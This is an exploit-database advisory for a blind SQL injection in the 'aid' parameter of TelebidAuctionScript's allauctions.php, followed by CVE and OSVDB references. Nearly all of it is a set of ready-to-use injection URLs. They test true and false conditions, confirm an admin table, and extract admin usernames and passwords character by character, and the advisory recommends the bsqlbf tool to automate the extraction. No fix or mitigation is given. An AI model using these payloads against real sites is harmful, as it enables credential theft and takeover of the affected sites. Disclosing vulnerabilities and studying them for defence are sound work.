TelebidauctionScript(aid) Blind SQL Injection Vulnerability ____________________________________ Author : Hussin X Home : www.IQ-TY.com email : darkangel_g85@Yahoo.com ____________________________________ Vendor : http://www.telebidauctionscript.com/ Demo : _______ http://server/allauctions.php?aid=2+and+1=1 (true) http://server/allauctions.php?aid=2+and+1=0 (false ) :: Table :: http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1 :: column pass and username :: http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1 http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1 note : Use the "bsqlbf" to write detailed information Greetz WwW.IQ-ty.CoM , Tryag.cc | CraCkEr | Cyber-Zone | str0ke | jiko
Related Exploits
Trying to match CVEs (1): CVE-2009-4058Trying to match OSVDBs (1): 60307
Other Possible E-DB Search Terms: TelebidAuctionScript
Date | D | V | Title | Author | No matches |
---|